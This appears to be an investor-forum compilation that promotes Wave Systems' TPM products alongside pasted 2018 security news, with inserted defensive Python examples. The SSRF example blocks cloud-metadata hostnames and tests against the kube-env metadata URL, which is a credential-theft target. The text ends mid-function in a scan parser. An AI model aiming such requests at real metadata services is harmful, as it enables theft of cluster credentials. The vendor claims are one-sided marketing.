With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Merry Christmas and Happy Holidays!
China hacked HPE and IBM, and then attacked their clients: Sources
https://www.cnbc.com/2018/12/21/china-hacked-hpe-and-ibm-and-then-attacked-their-clients-sources-.html
•Hackers working on behalf of China's Ministry of State Security breached the networks of Hewlett Packard Enterprise Co and IBM.
•The hackers then used the access to hack into their clients' computers, according to five sources familiar with the attacks.
•The attacks were part of a Chinese campaign known as Cloudhopper, which the U.S. and Britain said infected technology service providers in order to steal secrets from their clients.
Hackers working on behalf of China's Ministry of State Security breached the networks of Hewlett Packard Enterprise Co and IBM, then used the access to hack into their clients' computers, according to five sources familiar with the attacks.
The attacks were part of a Chinese campaign known as Cloudhopper, which the United States and Britain on Thursday said infected technology service providers in order to steal secrets from their clients.
While cybersecurity firms and government agencies have issued multiple warnings about the Cloudhopper threat since 2017, they have not disclosed the identity of technology companies whose networks were compromised.
International Business Machines Corp said it had no evidence that sensitive corporate data had been compromised. Hewlett Packard Enterprise (HPE) said it could not comment on the Cloudhopper campaign.
Businesses and governments are increasingly looking to technology companies known as managed service providers (MSPs) to remotely manage their information technology operations, including servers, storage, networking and help-desk support.
Cloudhopper targeted MSPs to access client networks and steal corporate secrets from companies around the globe, according to a U.S. federal indictment of two Chinese nationals unsealed on Thursday. Prosecutors did not identify any of the MSPs that were breached.
Both IBM and HPE declined to comment on the specific claims made by the sources.
"IBM has been aware of the reported attacks and already has taken extensive counter-measures worldwide as part of our continuous efforts to protect the company and our clients against constantly evolving threats," the company said in a statement. "We take responsible stewardship of client data very seriously, and have no evidence that sensitive IBM or client data has been compromised by this threat."
HPE said in a statement that it had spun out a large managed-services business in a 2017 merger with Computer Sciences Corp that formed a new company, DXC Technology.
"The security of HPE customer data is our top priority," HPE said. "We are unable to comment on the specific details described in the indictment, but HPE's managed services provider business moved to DXC Technology in connection with HPE's divestiture of its Enterprise Services business in 2017."
DXC Technology declined to comment, saying in a statement that it does not comment on reports about specific cyber events and hacking groups.
Reuters was unable to confirm the names of other breached technology firms or identify any affected clients.
The sources, who were not authorized to comment on confidential information gleaned from investigations into the hacks, said that HPE and IBM were not the only prominent technology companies whose networks had been compromised by Cloudhopper.
Cloudhopper, which has been targeting technology services providers for several years, infiltrated the networks of HPE and IBM multiple times in breaches that lasted for weeks and months, according to another of the sources with knowledge of the matter.
IBM investigated an attack as recently as this summer, and HPE conducted a large breach investigation in early 2017, the source said.
The attackers were persistent, making it difficult to ensure that networks were safe, said another source.
IBM has dealt with some infections by installing new hard drives and fresh operating systems on infected computers, said the person familiar with the effort.
Cloudhopper attacks date back to at least 2014, according to the indictment.
The indictment cited one case in which Cloudhopper compromised data of an MSP in New York state and clients in 12 countries including Brazil, Germany, India, Japan, the United Arab Emirates, Britain and the United States. They were from industries including finance, electronics, medical equipment, biotechnology, automotive, mining, and oil and gas exploration.
One senior intelligence official, who declined to name any victims who were breached, said attacks on MSPs were a significant threat because they essentially turned technology companies into launchpads for hacks on clients.
"By gaining access to an MSP, you can in many cases gain access to any one of their customers," said the official. "Call it the Walmart approach: If I needed to get 30 different items for my shopping list, I could go to 15 different stores or I could go to the one that has everything."
Representatives with the FBI and Department of Homeland Security declined to comment. Officials with the U.S. Justice Department and the Chinese embassy in Washington could not be reached.
A British government spokeswoman declined to comment on the identities of companies affected by the Cloudhopper campaign or the impact of those breaches.
"A number of MSPs have been affected, and naming them would have potential commercial consequences for them, putting them at an unfair disadvantage to their competitors," she said.
=================================================================
What to do if you cannot load the management console
https://windowsreport.com/management-console-not-loading/#.XB-sFE2pUiQ
Trying to run the Trusted Platform Module (TPM) Management console in Windows 10 can lead to the Cannot load management console error. This happens when the TPM has been either disabled or cleared in the BIOS. It applies to Windows 10 devices on version 1703 or version 1809.
The Trusted Platform Module, for those not in the know, is a dedicated piece of hardware that provides a secure environment for storing data of critical importance, such as encryption keys and signatures. That makes it important to make any changes to the TPM with the utmost care so as not to compromise the security of your PC.
However, fixing the above error is rather easy and can be done quickly enough.
Steps to fix management console loading issues
Since there are two ways the error is generated – disabled or cleared in BIOS – the solution too involves two distinct methods that have been discussed below.
Case 1: When TPM has been cleared in BIOS
If you know the TPM has been cleared in the BIOS, all that you have to do is close the TPM Management console and then start it again.
Case 2: When TPM has been disabled in BIOS:
In this case, you will have to re-enable it in BIOS. Here are the steps:
•Reboot your PC and enter the BIOS. This is usually done by pressing F2 repeatedly while the computer is booting, though the hotkey differs between PC brands.
•Look for the Security option on the left.
•Expand the Security option to reveal the TPM
•Select the TPM Security check box to view the TPM settings
•You will get to see the Deactivate and Activate radio buttons. Click on Activate to make TPM active.
The other option is to run a specific Windows PowerShell command. Note that you will need administrator privileges to run it. Here are the steps to follow:
1. Open Windows PowerShell as administrator. You can do this by right-clicking Start and selecting Windows PowerShell (Admin), or by typing Windows PowerShell in the Cortana search box, right-clicking the app and selecting Run as administrator.
2. Type the following commands and press Enter after each (gwmi is the alias of Get-WmiObject, and the WMI namespace path uses backslashes):
   # Bind to the TPM's WMI class in the Security namespace
   $tpm = gwmi -n root\cimv2\security\microsofttpm win32_tpm
   # Queue physical-presence request 6 (Enable + Activate); the firmware asks you to confirm it at the next boot
   $tpm.SetPhysicalPresenceRequest(6)
3. Restart your PC and accept any BIOS prompts that come your way.
That’s it. The Cannot load management console error shouldn’t be bothering you anymore. Microsoft has also stated they are further investigating the issue and will let us know if they come across something more interesting or useful.
==================================================================
Wouldn't it be cool if ERAS could automatically fix this manual problem in Windows 10, especially in a company's fleet of computers: have ERAS just set all the TPMs to active. It could save many users from doing this manual work and get all the TPMs active in the company network, imo. Active TPMs then could provide for known devices on the network and keep the bad guys (unknown devices) out. The TPM could then also be used for Wave Endpoint Monitor and Wave VSC 2.0!
New attack intercepts keystrokes via graphics libraries
https://www.zdnet.com/article/new-attack-intercepts-keystrokes-via-graphics-libraries/
Attack can guess text input from both hardware and on-screen keyboards alike.
A team of academics says they can determine user key presses by watching for data leaks in how a processor computes code from standard graphics libraries.
The general idea behind this research is that the code that renders text on screen via the standard graphics libraries included in modern operating systems leaks clues about the information it is processing, even if the text is hidden behind a password's generic dots.
This type of vulnerability --known as a side-channel attack-- isn't new, but it's been primarily utilized for recovering cleartext information from encrypted communications.
However, this new side-channel attack variation focuses on the CPU cache, which is shared between processes, and on the graphics-library code and data that render the operating system user interface (UI) through it.
In a research paper shared with ZDNet and that will be presented at a tech conference next year, a team of academics has put together a proof-of-concept side-channel attack aimed at graphics libraries.
They say that through a malicious process running on the OS they can observe these leaks and guess with high accuracy what text a user might be typing.
Sure, some readers might point out that keyloggers (a type of malware) can do the same thing, but the researchers' code has the advantage that it doesn't require admin/root or other special privileges to work.
The attack code can be hidden inside legitimate apps and recover keystrokes with a much lower chance of getting detected by antivirus products.
But the researchers' attack isn't something to worry about just yet. This attack is only theoretical, for now, and would be very hard to pull off by a low-skilled attacker.
Preparing a side-channel attack of this type requires studying how an operating system interacts with its graphics library on specific hardware architectures. An attacker would need to have precise hardware specs of a victim's computer, but also of the software the target uses, from where it intends to steal text (most likely login passwords).
But there are also advantages for this attack. For starters, compared to classic keylogging malware, this attack also works with on-screen keyboards and is not solely limited to collecting key presses from hardware keyboards.
Furthermore, the attack can be tailored to work on any OS, including mobile operating systems. During their tests, the researchers captured keystrokes on both Ubuntu and Android.
In addition, as the attack collects more key presses from graphics libraries, it also gets better at guessing the correct key presses.
The proof-of-concept attack researchers devised for their paper was coded to intercept only numerical and lowercase characters, but researchers say that an attacker can switch to a different prediction model to take into account uppercase letters and special characters if needed.
The research team has also recorded a demo of their attack, and plans to release its source code in the future.
More details about this attack will be available next year in a research paper entitled "Unveiling your keystrokes: A Cache-based Side-channel Attack on Graphics Libraries," authored by academics from the University of California, Riverside, Virginia Tech, and the US Army Research Lab.
The research team is scheduled to present their work at the Network and Distributed System Security Symposium (NDSS) that will take place in San Diego in late February 2019.
==================================================================
What would happen if an RSA SecurID user lost their SecurID? (and that is easy to do; see link below) The fill-in for the lost SecurID token would be very susceptible to this new attack along with the password. One compromised token and password could result in security failure for a company network. Wave VSC 2.0 - better security at less than half the cost.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
Cryptographic Erasure: Moving Beyond Hard Drive Destruction
https://www.darkreading.com/endpoint/cryptographic-erasure-moving-beyond-hard-drive-destruction/a/d-id/1333492
In the good old days, incinerating backup tapes or shredding a few hard drives would have solved the problem. Today, we have a bigger challenge.
Over the last decade we meticulously taught ourselves how to collect, store, and process big data. Now, the next challenge is to get rid of this data.
The General Data Protection Regulation (GDPR), with its sweeping mandates for protecting personal data, was a wake-up call for businesses across the board that they needed to exercise greater control over many aspects of their data processing practices. The California Consumer Privacy Act followed suit, and other upcoming privacy laws around the world will likely continue the trend.
Regulations around how data is used, data retention time frames, and data subjects' right to be forgotten all necessitate particular attention to data destruction. In the good old days, incinerating backup tapes or shredding a few hard drives would have solved the problem. Today, we have a bigger challenge on our hands.
We now work with complex, massively distributed computing environments. The resources we directly control are often spread across the globe, and the rest live in some external organization's opaque cloud. System components interact in complex (and sometimes unexpected) ways, forming both explicit and implicit data flows between them. The challenge is to track down where exactly data is before we can even start thinking about how to destroy it.
Cryptographic Erasure
Cryptographic erasure roughly means encrypting the data first, and when it is time to delete it, discarding the encryption key instead. Under computational assumptions that the underlying cryptographic primitives cannot be broken (and we can all agree that cryptography is the strongest link in a secure system), without the key, that data could never be decrypted again. It is as good as deleted.
Many readers will be familiar with the term from the recent NIST and ISO guidelines that recommend it as a secure data destruction technique. Storage media vendors have also been promoting cryptographic erasure as a faster alternative to traditional data destruction mechanisms. For example, self-encrypting drives in the market can refresh the key stored in their onboard controller, instantaneously rendering the contents unreadable.
In reality, however, this idea dates all the way back to 1996, first publicly proposed by Dan Boneh and Richard Lipton. In their paper titled "A Revocable Backup System," published in the USENIX Security Symposium, the authors describe a tape backup scheme in which backed-up data is encrypted with a periodically refreshed key. Every time the key changes, old backups are lost without requiring any modifications to the tape itself, analogous to modern self-encrypting drives.
So, how does this apply to our times and solve the problem of tracking data in and across complex computing environments? All of the previous examples focus on the use of cryptographic erasure as an efficient way to destroy all content on a given physical storage medium. However, let's take a step back and get a better view of the general principle behind the idea.
Cryptographic Erasure: Two Useful Properties
First, unlike in the previous scenarios, we do not need to restrict ourselves to using a single key that encrypts an entire drive or data set. Instead, we can have as many unique keys as we need, encrypting data at the granularity that serves our purposes. For example, a cloud service provider may decide to assign a unique key for each of its customers, allowing it to selectively destroy a specific customer's data when necessary. Otherwise, the provider may choose to partition the data at a finer granularity — a unique key per user, file, or even a database entry. The possibilities and business applications are immense.
Second, cryptographic erasure entirely bypasses the issue of tracking data flows. Whether the data resides in a remote data center, in someone else's cloud, or in a long-forgotten tape archive is irrelevant. The encrypted data is always bound to the encryption key, and it is sufficient to know where our keys are to be able to destroy all instances of our data.
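The two properties above, as an added example that is not part of the original article: every tenant gets its own data-encryption key, ciphertext copies are kept in two stores (standing in for a primary database and an off-site backup whose location we need not track), and erasing a tenant means deleting only the key. The cipher is a stand-in built from HMAC-SHA256 (counter-mode keystream, encrypt-then-MAC) so the example runs on the Python standard library alone; in production use AES-GCM from a real library and keep the key table in a KMS/HSM. Tenant names and record contents are constructed sample data.

```python
"""Per-tenant cryptographic erasure (illustrative, not the article's code)."""
import hashlib
import hmac
import os
import struct


class Erased(Exception):
    """Raised when the key for a record has been destroyed."""


def _derive(key: bytes, label: bytes) -> bytes:
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode used as a PRF keystream (stand-in for AES-CTR)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += _derive(enc_key, nonce + struct.pack(">Q", block))
        block += 1
    return bytes(out[:length])


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Return nonce || ciphertext || tag (encrypt-then-MAC)."""
    enc_key, mac_key = _derive(key, b"enc"), _derive(key, b"mac")
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt(key: bytes, blob: bytes) -> bytes:
    enc_key, mac_key = _derive(key, b"enc"), _derive(key, b"mac")
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication failed")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


class TenantStore:
    """Ciphertext may live anywhere; only the key table has to be tracked."""

    def __init__(self):
        self.keys = {}     # tenant -> data-encryption key (DEK)
        self.primary = {}  # (tenant, record_id) -> ciphertext
        self.backup = {}   # a second copy, e.g. an off-site replica we cannot reach

    def _dek(self, tenant: str) -> bytes:
        # A tenant erased earlier gets a fresh key here: old ciphertext stays dead.
        if tenant not in self.keys:
            self.keys[tenant] = os.urandom(32)
        return self.keys[tenant]

    def put(self, tenant: str, record_id: str, plaintext: bytes) -> None:
        blob = encrypt(self._dek(tenant), plaintext)
        self.primary[(tenant, record_id)] = blob
        self.backup[(tenant, record_id)] = blob

    def get(self, tenant: str, record_id: str, store: str = "primary") -> bytes:
        blob = getattr(self, store)[(tenant, record_id)]
        if tenant not in self.keys:
            raise Erased(f"key for {tenant!r} destroyed; ciphertext is unrecoverable")
        return decrypt(self.keys[tenant], blob)

    def crypto_erase(self, tenant: str) -> None:
        # Destroy the key only; the ciphertext copies are left where they are.
        self.keys.pop(tenant, None)


def demo():
    s = TenantStore()
    s.put("acme", "invoice-1", b"acme secret")        # constructed sample data
    s.put("globex", "invoice-1", b"globex secret")
    before = s.get("acme", "invoice-1", "backup")     # readable from the backup copy
    s.crypto_erase("acme")
    try:
        s.get("acme", "invoice-1", "backup")
        erased = False
    except Erased:
        erased = True
    other_tenant_ok = s.get("globex", "invoice-1") == b"globex secret"
    return before, erased, other_tenant_ok, len(s.backup)


if __name__ == "__main__":
    print(demo())
```

After `crypto_erase("acme")` both copies of acme's records are still present (`len(s.backup)` is unchanged) but neither can be decrypted, while globex is unaffected; that is the selective, location-independent destruction the article describes. The guarantee holds only if every copy of the key, including key backups and escrow, is destroyed too.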
Unfortunately, there is no silver bullet in security, and this is no exception. A prerequisite for this scheme to work is that all sensitive data must be encrypted at all times; any plaintext copy that escapes the scheme (a cache, a log line, a swap file, an old unencrypted backup) is not erased when the key is. (Maybe mandatory encryption is a good thing!) This implies a computational overhead for cryptographic operations, but more importantly, the decision to incorporate cryptographic erasure into a system is best made at the early architectural design stages. Retrofitting it into legacy systems is difficult and error prone.
Furthermore, as with every cryptographic system, storage and distribution of keys becomes a prime concern, especially with very fine-grained data partitioning schemes that can require large numbers of keys. Erasure is only as reliable as the key's destruction: every copy of the key, including those held in key backups or escrow, must be destroyed as well. This necessitates building an appropriate key management infrastructure, a task with which security professionals often have a love-hate relationship.
Cryptographic erasure is a powerful technique that can address emerging data destruction challenges, especially in the face of stringent privacy laws, where traditional approaches remain impractical. Security professionals should take advantage of this tool in their arsenal, understand its trade-offs, and recognize that cryptographic erasure can have advanced applications beyond wiping hard drives.
==================================================================
This article is another great reason for companies to have SEDs in their computer fleets!
==================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpt:
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
How Shopify Avoided a Data Breach, Thanks to a Bug Bounty
https://www.eweek.com/security/how-shopify-avoided-a-data-breach-thanks-to-a-bug-bounty
At KubeCon + CloudNativeCon NA 2018, Shopify and Google detail a Kubernetes security incident reported by a bug bounty security researcher that was quickly remediated before any harm was done.
Breaches occur on an all-too-frequent basis, but what is often never reported are the breaches that don't happen, thanks to organizations taking rapid, proactive measures. One such incident was outlined by Shopify at KubeCon + CloudNativeCon NA 2018 last week.
Thanks to a bug bounty program and the support of its vendor partner Google, Shopify was able to avoid a potentially disastrous flaw that could have enabled an attacker to take over Shopify's Kubernetes cluster. Shopify provides an e-commerce platform that allows vendors to sell goods and services. The platform is hosted on the Google Kubernetes Engine (GKE), which provides a hosted version of the open-source Kubernetes container orchestration platform.
"If you're not familiar with Shopify, we've got about 600,000 businesses, so there's a good chance that you've purchased something from us without even realizing it," Shane Lawrence, security infrastructure engineer at Shopify, said. "We processed about $26 billion last year, and during peak hours we get approximately 80,000 requests per second."
Shopify runs entirely on GKE, said Lawrence; the reason his company chose Kubernetes is to be able to rapidly respond to scaling demands like the recent Black Friday and Cyber Monday shopping events.
"With Kubernetes we can scale down to a single replica if we need to test things, or we can scale up to hundreds across multiple geographical locations," Lawrence said. "It's important to us that our application developers spend their time developing applications, not becoming Kubernetes experts."
To that end, Shopify built a self-serve platform where organizations can literally go in and press the create cloud runtime button and in minutes have web applications serving traffic running on Kubernetes. The Shopify system uses guardrails to warn organizations if they're doing something that Shopify thinks might not be best practice or might not be secure.
Bug Bounty
While Shopify has done its best to make the platform as secure as it can be, flaws are an unavoidable part of modern software. To help identify unknown flaws, Shopify makes use of a managed bug bounty program on the HackerOne platform. With a bug bounty program, security researchers are rewarded for responsibly and privately disclosing flaws.
"We recognize that it would be infeasible to hire 300 people to sit around all day every day and test every single commit and try to find some vulnerabilities," Lawrence said. "So instead we just leverage the power of the community, and in doing so we've had over 300 hackers over the last three years or so participate in our [bug bounty] program."
Lawrence said that over the last three years, Shopify has paid out more than $1 million in bug bounties.
The Kubernetes Flaw
Regarding the specific Kubernetes cluster flaw that was detailed at KubeCon, Lawrence said the bug came in at 7:39 p.m. on a Sunday night from security researcher Andre Baptista. Eleven minutes later, at 7:50 p.m., Shopify's security response team declared that the bug was in fact a security incident. At 8 p.m., Shopify's cloud security and app development teams were fully engaged on the issue, working on a fix.
Lawrence said that just over an hour after the report came in, Shopify's team made a code commit that disabled the vulnerable feature at 8:43 p.m. By 9:27 p.m., Shopify began the larger effort of investigating the full impact of the bug, cleaning up credentials and contacting Google to make sure nothing had been missed.
For his efforts, Shopify awarded Baptista a $25,000 reward.
SSRF
The security researcher was able to exploit a Server Side Request Forgery (SSRF) to obtain a Google service account token and the kube-env variable; the latter yielded a kubelet token that was then used to gain full control of the cluster.
"SSRF is where you convince a web server to make a request on your behalf," Lawrence explained.
Lawrence said the Google service account, and the metadata server that hands out its token, are used for interacting with other APIs in the cluster. The metadata server is meant to serve that token only to workloads running on the same cloud platform, never to end users, he said. By using the SSRF flaw, the researcher convinced the web server to request the token from the metadata server and relay it to him.
Google
According to Greg Castle, Kubernetes security lead at Google, his company had already anticipated that type of attack. The problem was that Shopify was somehow making use of a beta version of the vulnerable API.
Castle said that there was a known issue with the beta API that was fixed when it became stable. The challenge is that many organizations, including Shopify, were using the beta API and had a dependency on it. Castle said that Google has since announced that it will be turning off the beta API by default when Kubernetes 1.12 becomes generally available on GKE. The researcher was also able to get access to Kubernetes metadata leading to the Kube-env variable. Castle said that GKE has an option to conceal metadata, which effectively puts a proxy in between the metadata server and the containers that are running on the machine.
"It filters out sensitive information like Kube-env, and it was actually specifically developed for exactly this style of attack," Castle said. "That [metadata concealment] was available at the time. Shopify had tried it out, but had some problems with it, so it wasn't actually running on the cluster that the security researcher had tried. If it had been, it would have prevented this attack."
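The application-layer side of this defence, as an added example that is not Shopify's or Google's code: a web app that fetches user-supplied URLs server-side (the SSRF primitive Lawrence describes) should refuse any target that is not a public address, which rules out the link-local metadata address 169.254.169.254 and the metadata hostnames. On GCE the current v1 metadata endpoint additionally requires a `Metadata-Flavor: Google` request header that a naive SSRF cannot set, whereas the legacy v1beta1 endpoints did not; the platform-side mitigations Castle mentions (metadata concealment, disabling the legacy API) are the complementary layer. The resolver is injected so the check runs offline; the hostnames and addresses below are constructed sample inputs.

```python
"""Validate an outbound-fetch target against SSRF to the cloud metadata service."""
import ipaddress
from urllib.parse import urlsplit

# Hostnames that resolve to the metadata service on common clouds.
METADATA_HOSTNAMES = {
    "metadata.google.internal",  # GCE / GKE
    "metadata",                  # short alias GCE resolves
    "instance-data",             # EC2 alias
}


def _address_is_public(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 (::ffff:169.254.169.254) so it cannot slip past the IPv4 checks.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_target(url: str, resolver=None):
    """Return (ok, reason).

    `resolver(hostname) -> list of IP strings` is supplied by the caller (in production
    a real DNS lookup such as socket.getaddrinfo). The fetch itself must then be made to
    one of the addresses returned here, with redirects disabled, or DNS rebinding or a
    302 to 169.254.169.254 bypasses the check.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    if host.lower().rstrip(".") in METADATA_HOSTNAMES:
        return False, "metadata hostname"
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal, nothing to resolve
    except ValueError:
        if resolver is None:
            return False, "hostname requires resolution"
        addrs = resolver(host)
        if not addrs:
            return False, "unresolvable host"
    for a in addrs:
        if not _address_is_public(a):
            return False, f"{host} resolves to non-public address {a}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the kube-env path the article mentions, and a benign target.
    for u in ("http://169.254.169.254/computeMetadata/v1beta1/instance/attributes/kube-env",
              "http://metadata.google.internal/computeMetadata/v1/",
              "https://example.com/report"):
        print(u, validate_fetch_target(u, resolver=lambda h: ["93.184.216.34"]))
```

Rejecting by resolved address rather than by hostname string is the point: attackers reach the metadata service through IP literals, IPv6-mapped forms, redirects and DNS names under their control, so the check must run on what the socket will actually connect to.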
Looking forward, Castle said Google doesn't want organizations to have to opt into security like metadata concealment. As such, the plan is to provide a new method to have each Kubelet bootstrap itself with a cryptographic assertion that comes from a trusted platform module (TPM).
"The idea is that it will be a better way to bootstrap the Kubelet in the future that will replace the static token and fix up this security weakness," he said.
Generally speaking, Castle suggested that Kubernetes users make sure that Kubernetes service accounts are configured for least privilege, only providing access and privileges for what is needed to function. He also recommended that Kubernetes users follow platform guidelines from their Kubernetes providers for hardening the system.
==================================================================
Wave ESC can manage the TPM! Someone once said that when TPMs began to have many uses, Wave would benefit greatly. Here is another use of the TPM where Wave can help. imo. Shopify could open up the market for the TPM!
==================================================================
Lax Controls Leave Fortune 500 Overexposed On the Net
https://www.darkreading.com/perimeter/lax-controls-leave-fortune-500-overexposed-on-the-net/d/d-id/1333497
The largest companies in the world have an average of 500 servers and devices accessible from the Internet - and many leave thousands of systems open to attack.
Large companies are leaving easy-to-exploit systems exposed on the public Internet, raising the risk of a serious future compromise, according to data from two cybersecurity firms.
Rapid7 found that the average Fortune 500 firm had approximately 500 servers and devices connected to the Internet, with five to 10 systems exposing Windows file-sharing or Telnet services. Fifteen of the 21 industry sectors on which Rapid7 collected data had at least one member allowing public access to a Windows file-sharing service.
These simple-to-spot oversights suggest that companies do not have adequate control over which systems are connected to the public network, says Tod Beardsley, research director at Rapid7, which published a report on its findings last week.
"I would advise everyone, from the Fortune 500 on down, to be aware of what you are exposing to the Internet," Beardsley says. "Any chance you have of taking something off the Internet—every device you take off the Internet is one less device for attackers to compromise."
The report refutes the common wisdom that larger companies, with their greater resources and more skilled security teams, are better defended against cyberattacks than smaller firms. While it's easy to assume that larger firms generally have more resources to allocate to cybersecurity, they also have many more devices connected to the Net, a sprawling infrastructure, and a greater attack surface.
Both Rapid7's report and an earlier report by security monitoring firm BitSight found that larger firms were likely to have self-inflicted holes in their defenses.
"Bigger doesn't always mean better," says Jake Olcott, vice president of government affairs for BitSight. "Just because you are a large organization with lots of resources doesn't necessarily mean that your security performance is better. In general, the larger the organization, the larger the attack surface."
The reports show that companies need to focus on three main areas to button up their systems and eliminate the security issues for which attackers are constantly on the lookout.
Know Your Assets
Rapid7 had little trouble identifying the various systems and devices connected to the Internet. On average, Fortune 500 companies had 500 systems connected to the public network; large companies should treat that figure as the baseline for how many systems ought to be exposed. A significant fraction of technology, business-service and financial firms had thousands of exposed servers, Rapid7 found.
"When you are that far off of the norm, that tells me you have an asset management problem," Beardsley says. "It tells me that those companies are just littered with vulnerable systems connected to the Internet."
At least one company in each of the aerospace & defense, chemical, and retail industries had more than 20,000 systems accessible through the Internet, Rapid7 found.
Getting those assets under control is important. While many applications may warrant being connected to the Internet, the companies with greater than 1,000 connected systems are offering attackers a very enticing attack surface area.
Watch Outbound Traffic
Both Rapid7 and BitSight regularly see traffic generated by compromised systems coming from Internet addresses assigned to large companies. Rapid7, for example, found that the healthcare, retail, and technology sectors all had a high incidence of malicious traffic coming from their networks.
In its 2017 report, How Secure Are America’s Largest Business Partners?, BitSight found that 15% of companies produced traffic suggesting a compromise by Conficker, malware that is almost a decade old. Other infections included Necurs, Bedep, and Zeus. "Many organizations are not aware of these issues inside their networks," BitSight's Olcott says. "The traffic is absolutely an indicator that there is something bad happening."
It's not clear from the traffic data whether companies are having trouble eradicating malware or if they just don't know about a system harboring malicious code, he says.
"It could be a governance issue or a technology issue, or it might be an employee-training and awareness issue," Olcott says. "The root cause — the challenge that these organizations have is it is very hard for them to get visibility into their environments."
Eliminate Easy-to-Exploit Services
For modern companies, there is no reason to expose Windows file-sharing, Telnet, or file-transfer protocol (FTP) services to the public network. Yet at least a third of companies are hosting servers with one of those services available, according to BitSight data.
Exposing Windows file-sharing through the SMB protocol opens up companies to debilitating attacks such as WannaCry, NotPetya, and other ransomware. Companies in at least 15 of the 21 sectors monitored by Rapid7 have servers with Windows file-sharing available through the public network. And more than 48 companies of the Fortune 500 have Telnet exposed on the Net, the company says.
"If you can get rid of all of the Internet-facing Telnet and SMB, you are miles ahead of the rest of the Internet, and you will avoid contributing to the next WannaCry," Rapid7's Beardsley says.
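The three areas above (know your assets, eliminate easy-to-exploit services) reduce to a check that any organisation can run against its own public ranges. As an added example that is not Rapid7's or BitSight's code, the script below parses nmap "grepable" output (`nmap -oG`) from an external scan, reports hosts offering FTP, Telnet or SMB to the Internet, and lists scanned hosts that are absent from the asset inventory, which is the asset-management problem Beardsley describes. The scan text and inventory are constructed sample data.

```python
"""Flag Internet-exposed FTP/Telnet/SMB and unknown hosts from an nmap -oG scan."""
import re

# Services that should not be reachable from the public Internet.
EXPOSED_SERVICES = {21: "FTP", 23: "Telnet", 139: "NetBIOS session (SMB)", 445: "SMB"}

# Constructed sample scan of a documentation range (RFC 5737), not a real result.
SAMPLE_SCAN = """\
# Nmap 7.70 scan initiated as: nmap -oG - -p 21,22,23,80,139,443,445 203.0.113.0/28
Host: 203.0.113.10 (www.example.com)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (4)
Host: 203.0.113.11 ()\tPorts: 23/open/tcp//telnet///, 445/open/tcp//microsoft-ds///\tIgnored State: filtered (5)
Host: 203.0.113.12 (files.example.com)\tPorts: 21/open/tcp//ftp///, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (5)
# Nmap done
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def scanned_hosts(text: str) -> list:
    """Every host address that appears in the scan, whether or not ports were reported."""
    hosts = []
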